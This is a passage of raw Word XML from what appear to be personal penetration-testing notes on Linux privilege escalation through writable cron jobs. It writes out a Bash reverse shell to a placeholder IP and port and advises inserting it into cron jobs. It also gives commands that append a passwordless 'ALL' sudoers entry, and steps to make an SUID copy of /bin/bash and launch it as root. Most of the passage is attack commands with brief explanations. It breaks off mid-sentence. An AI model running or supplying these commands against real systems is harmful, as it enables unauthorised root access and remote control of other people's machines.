    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023F7">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="720"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">chmod +s /tmp/rootbash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023F8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="571"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Make it executable</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023F9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="571"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">chmod +x file.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023FA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="571"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Wait for cron job</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023FB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="571"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then run /tmp/rootbash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="571"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/tmp/rootbash –p</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023FD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="571"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Or you can also do a reverse shell payload</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023FE">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000023FF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002400">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002401">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_pdsm8fnk1tlx" w:id="319"/>
      <w:bookmarkEnd w:id="319"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Cron Job Payloads</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002402">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002403">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Bash Reverse Shell</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002404">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Tip: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">When you see a cron job and want to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">insert a Bash reverse shell</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, try just adding the Bash shell into like the first or last line of the cron job instead of deleting the cron job. And if that doesn't work, then delete the code inside of the cron job and just put the Bash shell. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002405">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="167"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here is an example of a Bash Reverse Shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002406">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="167"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">bash -i &gt;&amp; /dev/tcp/</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;your-ip&gt;</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;port&gt;</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 0&gt;&amp;1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002407">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="167"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-i → runs it in interactive mode so it behaves like a normal shell (reads from stdin, prints prompts, etc.).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002408">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002409">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Running a file as sudo</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000240A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you ever see a cron job that allows you to run a file as sudo, and you can edit or add a file, then create a file that simply says "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/bin/bash</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, and then once you run that file as sudo, it will open a root shell for you</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000240B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1050"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">touch shell.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000240C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1050"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">echo '/bin/sh' &gt; shell.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000240D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1050"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">chmod 777 shell.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000240E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1050"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">chmod 777 allows read/write/execute permissions for ALL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000240F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002410">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Give Sudo Privileges to current user</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002411">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Or you can give all sudo privilege to your current user:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002412">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="327"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">echo 'echo " </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">michael </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ALL=(ALL) NOPASSWD:ALL" &gt;&gt; /etc/sudoers' &gt;</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> cleanup.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002413">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1219"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Replace "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">michael</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" with the username of your current user</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002414">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1219"/>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cleanup.sh</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" with your desired name</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002415">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1219"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Result: Once the cron job executes cleanup.sh as root, your user gains passwordless root privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002416">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002417">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Make an SUID copy of /bin/bash </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002418">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Or you can make a copy of /bin/bash and set the SUID bit:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002419">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1306"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">#!/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000241A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1306"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cp /bin/bash /tmp/rootbash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000241B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1306"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">chmod +s /tmp/rootbash</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000241C">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you want to be extra safe, find the full path to cp and chmod incase PATH variable is broken</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000241D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then to execute it, run this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000241E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="762"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/tmp/rootbash -p </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000241F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="762"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The "-p" is specific to /bin/bash and tells it to make sure to run bash with the SUID bit and not as our current user permissions </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002420">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002421">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Make a root copy of /bin/bash in one line:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002422">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is from </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
